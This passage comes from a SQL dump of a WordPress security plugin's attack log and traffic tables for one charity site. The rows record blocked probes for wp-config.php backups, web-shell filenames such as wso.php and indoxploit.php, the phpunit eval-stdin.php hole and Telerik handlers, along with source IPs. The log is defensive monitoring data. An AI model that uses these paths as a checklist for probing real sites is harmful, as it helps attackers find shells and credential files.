'',0,1675016992.6145,55,'PS2xlbovhj8cJRsAEGW1zVwe','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.rej'),('89.187.168.80',1505470544,'',0,1675016992.7647,55,'yws5N8FOXKprtS1ndaVxflYc','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.sass-cache'),('89.187.168.80',1505470544,'',0,1675016992.9212,55,'kVu2PH4hRLC6dZcUTtEA9eD8','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.sav'),('89.187.168.80',1505470544,'',0,1675016993.1119,55,'CnsOa06zxpy945Y1dioRTfhS','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.save.2'),('89.187.168.80',1505470544,'',0,1675016993.2605,55,'fZwBbCdUmyHptv1NGc7Wx34F','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.save.3'),('89.187.168.80',1505470544,'',0,1675016993.4153,55,'3ctNxSOMEQqinLV9RXoCz0dH','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.sublime-project'),('89.187.168.80',1505470544,'',0,1675016993.5705,55,'EJtOab9ciIR8SHqwBdPCMYr7','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.sublime-workspace'),('89.187.168.80',1505470544,'',0,1675016993.7379,55,'LChfgeyDatM1SQ8GoIHvz5Nb','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.tar.gz'),('89.187.168.80',1505470544,'',0,1675016993.9288,55,'69StbDjU5G0JAfaMz87H23xW','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.un~'),('89.187.168.80',1505470544,'',0,1675016994.1100,55,'5EfuGxLbgqaA6sR3TNWFhSp9','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.vb'),('89.187.168.80',1505470544,'',0,1675016994.2588,55,'Hz4Gs9W6w7yon8AVqkrElTSu','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.vbproj'),('89.187.168.80',1505470544,'',0,1675016994.4079,55,'mQb6kCJfOoFcjpx0PAeNIvRh','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php.vi'),('89.187.168.80',1505470544,'',0,1675016994.5599,55,'nI7BCsGRpmwMAo1Nl0aZjOK8','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php0'),('89.187.168.80',1505470544,'',0,1675016994.7531,55,'K5HfV17r0kbt4IxROFzlDYio','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php3'),('89.187.168.80',1505470544,'',0,1675016994.9159,55,'LYKGdUM8Fhp6vQoDgtIbzO0x','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php4'),('89.187.168.80',1505470544,'',0,1675016995.0705,55,'a86Dib4xuWItoM3y2nXEc0AL','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php5'),('89.187.168.80',1505470544,'',0,1675016995.2221,55,'LzT1qZN6ShIjAJGEQtl0bHXv','','19|0|0|0|www.equalitywalk.org.uk/wp-config.php6'),('74.208.190.148',1255194260,'',0,1675027606.2189,55,'KHyWmEQe7hkbOl3zjgCFvSZo','','19|0|0|0|www.equalitywalk.org.uk/wsoyanzorng.php'),('74.208.190.148',1255194260,'',0,1675027658.2380,55,'cseOanX35ybPFfhd82m9QvB1','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wsoyanzorng.php'),('89.35.6.211',1495467731,'',0,1675043565.8674,55,'ChnWHye4bS5lgYAKzIPGsX6d','','19|0|0|0|equalitywalk.org.uk/wp-admin/maint/index.php'),('116.203.119.56',1959491384,'',0,1675044395.6328,55,'rHesEwAjKQ3ZyCVOnlYg0BTN','','19|0|0|0|equalitywalk.org.uk/wp-includes/shell20211028.php'),('116.203.119.56',1959491384,'',0,1675044396.7795,55,'qcad1XxJKsrTHNQevwmGzLn5','','19|0|0|0|equalitywalk.org.uk/wp-includes/shell20211028.php'),('116.203.119.56',1959491384,'',0,1675044397.9591,55,'T7rzWSifG45gtuYJDwVMpLn2','','19|0|0|0|equalitywalk.org.uk/1index.php'),('116.203.119.56',1959491384,'',0,1675044399.2738,55,'KUP0q5xtC4691ODYRJfyAmQ3','','19|0|0|0|equalitywalk.org.uk/1index.php'),('116.203.119.56',1959491384,'',0,1675047193.2585,55,'JGrNWUiSpfjyIxwDEocbQv2T','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/shell20211028.php'),('116.203.119.56',1959491384,'',0,1675047195.2597,55,'rHlNfWR5su2LXQ8MkOJzGDy0','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/shell20211028.php'),('116.203.119.56',1959491384,'',0,1675047197.3274,55,'vzejW6YT0H2I7pJaoFmE3ZOi','','19|0|0|0|www.equalitywalk.org.uk/1index.php'),('116.203.119.56',1959491384,'',0,1675047199.4340,55,'jKpXMBiu5gEJtdPbsa7LZolm','','19|0|0|0|www.equalitywalk.org.uk/1index.php'),('185.150.191.81',3113664337,'',0,1675047293.1371,55,'zoZ1QaJL3nEf0TsKUXcCwBY7','','19|0|0|0|www.equalitywalk.org.uk/wp-plain.php'),('185.150.191.81',3113664337,'',0,1675047293.6709,55,'BURnI9adS4s6okOc1hwC7P3b','','19|0|0|0|www.equalitywalk.org.uk/vnarzavc.php'),('185.150.191.81',3113664337,'',0,1675047295.9067,55,'t260rqkWzgpdfbRTJGLNix5H','','19|0|0|0|www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php'),('185.150.191.81',3113664337,'',0,1675047296.6348,55,'QkuyIRGN2g4mnfWZjpB8twSz','','19|0|0|0|www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php.suspected'),('176.31.110.126',2954849918,'',0,1675054518.7492,55,'VF3pegy6LQHEUrJfDsIdCNmj','','19|0|0|0|www.equalitywalk.org.uk/wp-reset.php'),('176.31.110.126',2954849918,'',0,1675054519.1099,55,'icaMG69k85IYtLBlfQCudWvq','','19|0|0|0|www.equalitywalk.org.uk/wp-setups.php'),('176.31.110.126',2954849918,'',0,1675054519.3697,55,'L1Dyi0vCaFUGtSo9u4Vw3XKJ','','19|0|0|0|www.equalitywalk.org.uk/about.php'),('176.31.110.126',2954849918,'',0,1675054519.5973,55,'MfHVEI1SunxOvQjz42LTChrY','','19|0|0|0|www.equalitywalk.org.uk/about.php'),('176.31.110.126',2954849918,'',0,1675054519.9022,55,'MbyI5kTuriK0URAQOYSWqhCE','','19|0|0|0|www.equalitywalk.org.uk/admin.php'),('176.31.110.126',2954849918,'',0,1675054520.0250,10,'MbyI5kTuriK0URAQOYSWqhCE','','707|0|0|0|www.equalitywalk.org.uk/admin.php'),('176.31.110.126',2954849918,'',0,1675054520.2857,18,'kuoSf38yRVwxT7OlXg4aetrs','','13|0|0|0|www.equalitywalk.org.uk/admin.php'),('176.31.110.126',2954849918,'',0,1675054520.5554,100,'hMjnzrV9bURekY5tcHD4OsAw','','13|0|0|0|www.equalitywalk.org.uk/wp-story.php'),('176.31.110.126',2954849918,'',0,1675054520.7035,18,'VGYxki1QaIZv0lFupytC5A4X','','13|0|0|0|www.equalitywalk.org.uk/wp-story.php'),('176.31.110.126',2954849918,'',0,1675054520.9303,55,'jZBDrLQG1asbJgxd43K6CUmS','','19|0|0|0|www.equalitywalk.org.uk/simple.php'),('108.167.189.32',1822932256,'',0,1675077057.6463,55,'qeAUufH5jFTSJmxOGrb1a0NE','','19|0|0|0|equalitywalk.org.uk/991176.php'),('20.245.185.110',351648110,'',0,1675079148.4021,55,'6rVbt4CXKT2nAvOaw53BEDzc','','19|0|0|0|www.equalitywalk.org.uk//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('51.68.11.223',860097503,'',0,1675081327.6400,55,'9K6D0eYEyHdSWqgtJau2Unzf','','19|0|0|0|equalitywalk.org.uk/small.php'),('51.77.78.41',860704297,'',0,1675094893.4330,55,'rPNFvVw6InDfMY57bBHtXWkQ','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/css/modules.php'),('51.77.78.41',860704297,'',0,1675094893.7416,55,'Q8MKGnSvsbOLEWq0puNPrVjg','','19|0|0|0|www.equalitywalk.org.uk/wso.php'),('51.77.78.41',860704297,'',0,1675094895.7285,55,'ZIBaM6Drxm1kpRfwhTUsJoqF','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/shapes.php'),('51.77.78.41',860704297,'',0,1675094896.0926,55,'hX3vNdzkbJxAMFiG9qeDRYy5','','19|0|0|0|www.equalitywalk.org.uk/olux.php'),('51.77.78.41',860704297,'',0,1675094896.5025,55,'GioEuR9sapO7T2kzMSwn1B65','','19|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('51.77.78.41',860704297,'',0,1675094896.5328,10,'GioEuR9sapO7T2kzMSwn1B65','','707|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('51.77.78.41',860704297,'',0,1675094897.3479,55,'fM92KacCkNj8EWAbm3Y7v5FV','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('51.77.78.41',860704297,'',0,1675094897.9165,55,'YUvCNRDmk6uSGQ7Mnh0qcxsX','','19|0|0|0|www.equalitywalk.org.uk/upload.php'),('51.77.78.41',860704297,'',0,1675094899.0786,55,'xcl9zf6PejbQkRU0AZ3osSiX','','19|0|0|0|www.equalitywalk.org.uk/shell.php'),('51.77.78.41',860704297,'',0,1675094899.3483,55,'3dAQnNgsKByMerTRUa91IJxt','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/network/wp-footer.php'),('51.77.78.41',860704297,'',0,1675094899.8401,55,'dh1INgtmErUWqlG9MJXKwzTR','','19|0|0|0|www.equalitywalk.org.uk/wp-info.php'),('51.77.78.41',860704297,'',0,1675094900.4676,55,'u0EltL12AZWPpRX3VUsMTnOk','','19|0|0|0|www.equalitywalk.org.uk/upel.php'),('51.77.78.41',860704297,'',0,1675094901.2771,55,'groiD4tPXuA8BxqdmkwQLOyn','','19|0|0|0|www.equalitywalk.org.uk/098.php'),('51.77.78.41',860704297,'',0,1675094901.5686,55,'Jnx316Ul4RyTsVKN8Cbvahjq','','19|0|0|0|www.equalitywalk.org.uk/V5.php'),('51.77.78.41',860704297,'',0,1675094901.9071,55,'ZPp2HAUGfk6BXh7VO3lN0WgJ','','19|0|0|0|www.equalitywalk.org.uk/new_license.php'),('51.77.78.41',860704297,'',0,1675094902.3949,55,'rPuj2XbLEDvo7mtQcRVT3YCN','','19|0|0|0|www.equalitywalk.org.uk/wso.php'),('51.77.78.41',860704297,'',0,1675094902.6228,55,'hKwe6vTPfODqFgix085kzN2o','','19|0|0|0|www.equalitywalk.org.uk/modules/modules/modules.php'),('51.77.78.41',860704297,'',0,1675094902.8412,55,'RkdVmIxgzHEntU8wiyXs5AGN','','19|0|0|0|www.equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php'),('51.77.78.41',860704297,'',0,1675094903.1452,55,'wOXYfpTU9bLz1IrDx3dPM4vm','','19|0|0|0|www.equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/udd.php'),('51.77.78.41',860704297,'',0,1675094903.4805,55,'iqlmREKh3bf7kXrwSj82yUeA','','19|0|0|0|www.equalitywalk.org.uk/libraries/joomla/css.php'),('51.77.78.41',860704297,'',0,1675094903.7397,100,'lqGJUN6sfK1z7W5u3ItDZ9PV','','13|0|0|0|www.equalitywalk.org.uk/libraries/joomla/jmails.php'),('51.77.78.41',860704297,'',0,1675094904.1048,100,'WfprNCwi5Gon3MvX897q2h0K','','13|0|0|0|www.equalitywalk.org.uk/libraries/joomla/jmail.php'),('51.77.78.41',860704297,'',0,1675094904.4732,55,'PxsBifgmdGDerzEWHMlNLaAY','','19|0|0|0|www.equalitywalk.org.uk/images/vuln.php'),('51.77.78.41',860704297,'',0,1675094904.7727,55,'UDAsnLyErJ0jq2Nwt4zaf13c','','19|0|0|0|www.equalitywalk.org.uk/tmp/vuln.php'),('51.77.78.41',860704297,'',0,1675094905.1564,55,'57v4JF9cPHVNm6TCBrYhz10G','','19|0|0|0|www.equalitywalk.org.uk/XxX.php'),('51.77.78.41',860704297,'',0,1675094905.6087,55,'eOvzLZS4xTMkhWHnJ8ywBC5i','','19|0|0|0|www.equalitywalk.org.uk/Marvins.php'),('51.77.78.41',860704297,'',0,1675094906.0458,100,'GEnF4HjWKAOgf1R0Iov6qmsP','','13|0|0|0|www.equalitywalk.org.uk/rxr.php'),('51.77.78.41',860704297,'',0,1675094906.4932,55,'UY2JFwGd6zIVbjiyDu1fEHoO','','19|0|0|0|www.equalitywalk.org.uk/olux.php'),('51.77.78.41',860704297,'',0,1675094906.8267,55,'qID8wtiZ167Cek9NBQTU0moy','','19|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('51.77.78.41',860704297,'',0,1675094907.2341,55,'ZXqMWKPamTiswdAhSv0BoLcp','','19|0|0|0|www.equalitywalk.org.uk/error.php'),('51.77.78.41',860704297,'',0,1675094907.7910,55,'EbRoX0TKHd4hJy6nuLz39qCf','','19|0|0|0|www.equalitywalk.org.uk/RxR.php'),('51.77.78.41',860704297,'',0,1675094908.1374,55,'ZHp8fxYTDv67ULnwQ5yM2tgI','','19|0|0|0|www.equalitywalk.org.uk/components/com_b2jcontact/izoc.php'),('51.77.78.41',860704297,'',0,1675094908.5191,55,'LWfD74u6Rl5ijypM1XGAQHKP','','19|0|0|0|www.equalitywalk.org.uk/V3.php'),('51.77.78.41',860704297,'',0,1675094908.8198,55,'CeQIjZ53UONJaoLrlE0XsbcK','','19|0|0|0|www.equalitywalk.org.uk/V5.php'),('51.77.78.41',860704297,'',0,1675094909.7545,55,'QdCouMyxUR5vYAmcDnJH74BV','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('51.77.78.41',860704297,'',0,1675094910.1983,55,'MfawCSIOh6ZVxQ4DTzmNBWiR','','19|0|0|0|www.equalitywalk.org.uk/upload.php'),('51.77.78.41',860704297,'',0,1675094910.6194,55,'aKYvSmCihLk4H7o2FDbnqV39','','19|0|0|0|www.equalitywalk.org.uk/shell.php'),('51.77.78.41',860704297,'',0,1675094910.9646,55,'vrHp6JALRWX3iFeqnPNSodQ4','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/bluestork/index.php'),('51.77.78.41',860704297,'',0,1675094911.3630,55,'p0bOcVlrX5IEtuwN9JxWBDGC','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/bluestork/error.php'),('51.77.78.41',860704297,'',0,1675094911.6225,55,'4vqQW1ZtVg6hRHafUBi2GpFX','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/hathor/index.php'),('51.77.78.41',860704297,'',0,1675094911.9771,55,'retd5Xwn60zTA3JNblygGKxa','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/hathor/error.php'),('51.77.78.41',860704297,'',0,1675094912.9947,55,'qbiLg4J7MmSyzRoNIYZpQTHu','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/isis/index.php'),('51.77.78.41',860704297,'',0,1675094913.4283,55,'O9TdgC5WqPEuzvkYf8XVsb6w','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/isis/error.php'),('51.77.78.41',860704297,'',0,1675094913.8875,55,'4RQB2tfAclsaGjxuEkIySgWK','','19|0|0|0|www.equalitywalk.org.uk/templates/beez/index.php'),('51.77.78.41',860704297,'',0,1675094914.6185,55,'AUyJO5lw0k2QWBGYEvhIKz1u','','19|0|0|0|www.equalitywalk.org.uk/templates/ja_purity/index.php'),('51.77.78.41',860704297,'',0,1675094915.0728,55,'5S2hxRtsKYqJO9FaDzNTMw68','','19|0|0|0|www.equalitywalk.org.uk/templates/rhuk_milkyway/index.php'),('51.77.78.41',860704297,'',0,1675094915.5764,55,'ufwQ8n46IBYGHtxhM7omVWv5','','19|0|0|0|www.equalitywalk.org.uk/templates/system/index.php'),('51.77.78.41',860704297,'',0,1675094915.8582,55,'A7xhqu9OCKe3GiPcXjorLfRQ','','19|0|0|0|www.equalitywalk.org.uk/templates/system/error.php'),('51.77.78.41',860704297,'',0,1675094916.3324,55,'a1kCh2f0Q9vruoBjs8qElzxm','','19|0|0|0|www.equalitywalk.org.uk/templates/beez3/index.php'),('51.77.78.41',860704297,'',0,1675094916.7538,55,'ceA8QKEJYkz5o4Id7OCN1SfB','','19|0|0|0|www.equalitywalk.org.uk/templates/beez3/error.php'),('51.77.78.41',860704297,'',0,1675094917.4545,55,'Dc32uaZNImb5yhklBdXx0iCH','','19|0|0|0|www.equalitywalk.org.uk/templates/beez5/index.php'),('51.77.78.41',860704297,'',0,1675094917.8072,55,'bKdS5G6Mjq2kiEt7wP1OrXhp','','19|0|0|0|www.equalitywalk.org.uk/templates/beez5/error.php'),('51.77.78.41',860704297,'',0,1675094918.2067,55,'Q5mtWHzjEwuRkoSgDOsh3ZvN','','19|0|0|0|www.equalitywalk.org.uk/templates/beez_20/index.php'),('51.77.78.41',860704297,'',0,1675094918.6247,55,'vIOgb0twWDQ3qRCU8f6pilkL','','19|0|0|0|www.equalitywalk.org.uk/templates/beez_20/error.php'),('51.77.78.41',860704297,'',0,1675094919.0840,55,'zXQdUG4vhRP2wIsEuLMq19Vy','','19|0|0|0|www.equalitywalk.org.uk/templates/protostar/index.php'),('51.77.78.41',860704297,'',0,1675094919.4323,55,'i2TLtQMf3Ol1rz805mwkdu4q','','19|0|0|0|www.equalitywalk.org.uk/templates/protostar/error.php'),('51.77.78.41',860704297,'',0,1675094919.8151,55,'VeKbCSIkOYq9FZzuoNALXBl1','','19|0|0|0|www.equalitywalk.org.uk/templates/atomic/index.php'),('51.77.78.41',860704297,'',0,1675094920.4972,55,'qliT49rdI0U1s8gPnScmxZ7E','','19|0|0|0|www.equalitywalk.org.uk/templates/atomic/error.php'),('51.77.78.41',860704297,'',0,1675094921.0347,55,'g85NodPjsDw3z6HamAuJtVMb','','19|0|0|0|www.equalitywalk.org.uk/olux.php'),('51.77.78.41',860704297,'',0,1675094921.5202,55,'IAacrJBt0moDshNOVnW5pU8l','','19|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('51.77.78.41',860704297,'',0,1675094922.0828,55,'a7MNxi4yS1fzXkTl395hVF8v','','19|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('51.77.78.41',860704297,'',0,1675094922.3232,55,'twkTEv9lWoY13Us2LMBumxgH','','19|0|0|0|www.equalitywalk.org.uk/wso.php'),('51.77.78.41',860704297,'',0,1675094925.6321,55,'xUvdPiTwO03esQfHl5S2mIuc','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('51.77.78.41',860704297,'',0,1675094926.1499,55,'g2WTFqOod389Gh7kx1enCVE4','','19|0|0|0|www.equalitywalk.org.uk/upload.php'),('51.77.78.41',860704297,'',0,1675094926.6731,55,'4TgPDJ573089dXmRseMiaECf','','19|0|0|0|www.equalitywalk.org.uk/shell.php'),('147.78.47.230',2471374822,'',0,1675119722.9712,55,'25jBtzs8yVHxIorENUOQh7ui','','19|0|0|0|www.equalitywalk.org.uk/wp-reset.php'),('182.145.92.91',3062979675,'',0,1675132130.5392,55,'wpZOzLA1gDfWVCFhB7tUXyGR','','19|0|0|0|www.equalitywalk.org.uk/1.php'),('125.65.229.13',2101470477,'',0,1675132130.5577,55,'hyfK5OVi87lzY2nmNwHkMXCg','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/admins.php'),('182.145.92.11',3062979595,'',0,1675132131.2881,55,'NBzVg6pdXj2MEcSlIP35YaW4','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/1.php'),('154.247.138.225',2599914209,'',0,1675134566.6838,55,'t1V6EDWpahBU8C3kRxAuSdyj','','19|0|0|0|www.equalitywalk.org.uk/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx'),('54.37.121.239',908425711,'',0,1675137778.5566,55,'BtM8ZzPLocJ54eR3fbvCEajh','','19|0|0|0|equalitywalk.org.uk/wp-admin/patior/index.php'),('154.247.138.225',2599914209,'',0,1675141804.1514,55,'kyzBOsCILlwd1XbJxGr4pEfH','','19|0|0|0|www.equalitywalk.org.uk/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx'),('154.247.138.225',2599914209,'',0,1675141805.0715,55,'Ja2Dg6w7ZKtNV3izEhsAWf8X','','19|0|0|0|www.equalitywalk.org.uk/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx'),('154.247.138.225',2599914209,'',0,1675141806.0577,55,'l4Aj0mfzrsOJbudVv8yPCTt7','','19|0|0|0|www.equalitywalk.org.uk/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx'),('67.205.150.91',1137546843,'',0,1675148096.1830,55,'DIGgpESxmFioM7Z0rvUbuXOw','','19|0|0|0|equalitywalk.org.uk/patior/index.php'),('51.68.11.195',860097475,'',0,1675156412.8678,55,'YgyBv6wtceJhZqrQkE3U1pdK','','19|0|0|0|equalitywalk.org.uk/wp-info.php'),('194.169.175.26',3265900314,'',0,1675165002.5840,55,'rx3akeZRd78NB4bOLETu5qn2','','19|0|0|0|www.equalitywalk.org.uk/wso112233.php'),('194.169.175.26',3265900314,'',0,1675165018.3512,55,'vwLUmrz6lisWo5EagqxyKZjI','','19|0|0|0|www.equalitywalk.org.uk/bala.php'),('194.169.175.26',3265900314,'',0,1675165040.2607,55,'Pbc4RDQzjYMoO0ErG9J7Bq2a','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-class.php'),('194.169.175.26',3265900314,'',0,1675165049.4434,55,'KYlSmDiTNcn97QHthPfyZJ0x','','19|0|0|0|www.equalitywalk.org.uk/xleet-shell.php'),('194.169.175.26',3265900314,'',0,1675165056.8067,55,'Hf7laGgVwK0oMsNPb5OT2nWj','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/xleet-shell.php'),('194.169.175.26',3265900314,'',0,1675165056.8790,10,'Hf7laGgVwK0oMsNPb5OT2nWj','','707|0|0|0|www.equalitywalk.org.uk/wp-admin/xleet-shell.php'),('158.69.23.79',2655328079,'',0,1675192775.7286,55,'02GNjoiXLYWDbzQdUtkMZwhS','','19|0|0|0|equalitywalk.org.uk/wp-admin/css/colors/colors.php'),('158.69.23.79',2655328079,'',0,1675192777.3819,55,'QM5apPUb2W76VeGywqdRAF3K','','19|0|0|0|equalitywalk.org.uk/wp-includes/wp-includes.php'),('158.69.23.79',2655328079,'',0,1675192778.9822,55,'0lAg3yocO9STPUkVC6GuI1h2','','19|0|0|0|equalitywalk.org.uk/wp-admin/wp-admin.php'),('67.205.150.91',1137546843,'',0,1675199047.8262,55,'Qkua3TmGlWdSXvJRMF2y5HEA','','19|0|0|0|equalitywalk.org.uk/wp-includes/pomo/update.php'),('47.110.160.63',795779135,'',0,1675200836.5947,55,'HtkcMrIWaPD1uozE3ixwGCpA','','19|0|0|0|equalitywalk.org.uk/wp-content.php'),('47.110.160.63',795779135,'',0,1675200843.8656,55,'JQxZtYf5qUG7kE4wWnCiIR06','','19|0|0|0|equalitywalk.org.uk/wp-content.php'),('195.54.174.8',3275140616,'',0,1675201968.5359,55,'2H8MNA5Q9FCyP1wLulGcJsOU','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/css/lj4utm.php'),('195.54.174.8',3275140616,'',0,1675201971.6975,55,'m3vG2UlZ1atg0fYPWnDAJeOB','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/css/colors/ectoplasm/0.php'),('195.54.174.8',3275140616,'',0,1675201973.8196,55,'V2LJoG9nzM7w6TOrWUgfkdA8','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/Text/Diff/Engine/temp.php'),('4.233.147.230',82416614,'',0,1675205824.6328,55,'i0nKTj9rtXAIWVxOR3fGuDdy','','19|0|0|0|www.equalitywalk.org.uk/wp-22.php'),('67.227.199.102',1139001190,'',0,1675209305.1814,55,'SsA70EnLzmceQJpjPKqTfyRX','','19|0|0|0|equalitywalk.org.uk/.well-known/atomlib.php'),('194.38.20.161',3257275553,'',0,1675209342.2367,55,'E5BQKHYXrpSkCjxi1MqTyUW0','','19|0|0|0|equalitywalk.org.uk/sites/all/libraries/plupload/examples/upload.php');
/*!40000 ALTER TABLE `cerber_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_qmem`
--

DROP TABLE IF EXISTS `cerber_qmem`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_qmem` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `stamp` int(10) unsigned NOT NULL,
  KEY `ip_stamp` (`ip`,`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_qmem`
--

LOCK TABLES `cerber_qmem` WRITE;
/*!40000 ALTER TABLE `cerber_qmem` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_qmem` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_traffic`
--

DROP TABLE IF EXISTS `cerber_traffic`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_traffic` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `hostname` varchar(250) NOT NULL DEFAULT '',
  `uri` text NOT NULL,
  `request_fields` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `request_details` mediumtext NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `processing` int(10) NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `request_method` char(8) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `wp_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `wp_type` int(10) unsigned NOT NULL DEFAULT 0,
  `is_bot` int(10) unsigned NOT NULL DEFAULT 0,
  `blog_id` int(10) unsigned NOT NULL DEFAULT 0,
  `php_errors` text NOT NULL,
  `req_status` int(10) unsigned NOT NULL DEFAULT 0,
  KEY `stamp` (`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_traffic`
--

LOCK TABLES `cerber_traffic` WRITE;
/*!40000 ALTER TABLE `cerber_traffic` DISABLE KEYS */;
INSERT INTO `cerber_traffic` VALUES ('20.127.168.18',343910418,'','https://equalitywalk.org.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','GwVotMbCdIKl0xSkeT5iRP8j',0,1672764431.4493,99,'','POST',403,0,700,0,1,'',0),('20.127.168.18',343910418,'','https://equalitywalk.org.uk/lagpiyap.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','QJB6z9NCcktApgn47THqDS8j',0,1672764431.7101,108,'','GET',403,0,700,0,1,'',0),('20.127.168.18',343910418,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','FmxYipaDIkVzyh40v7Tj8Qe2',0,1672764432.6544,132,'','GET',403,0,700,0,1,'',0),('20.127.168.18',343910418,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','j593nyKwDcd4XUg7J8x1hfvV',0,1672764433.1177,99,'','GET',403,0,700,0,1,'',0),('52.141.49.8',881668360,'','https://equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.6.0 CPython\\/2.7.5 Linux\\/3.10.0-1160.80.1.el7.x86_64\"}','Hvc4P9MdN1YJTfnaER8sODKy',0,1672776304.0725,106,'','GET',403,0,700,0,1,'',0),('52.141.49.8',881668360,'','https://www.equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.6.0 CPython\\/2.7.5 Linux\\/3.10.0-1160.80.1.el7.x86_64\"}','30fWtHJNg1c6IkvAYudXBLym',0,1672777417.3812,98,'','GET',403,0,700,0,1,'',0),('194.38.20.161',3257275553,'','https://equalitywalk.org.uk/sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','Dt38JN2rcFYfPpG1eAuqkRTz',0,1673434952.9358,9374,'','GET',403,0,700,0,1,'',0),('66.23.225.248',1108861432,'','https://www.equalitywalk.org.uk/phpinfo.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 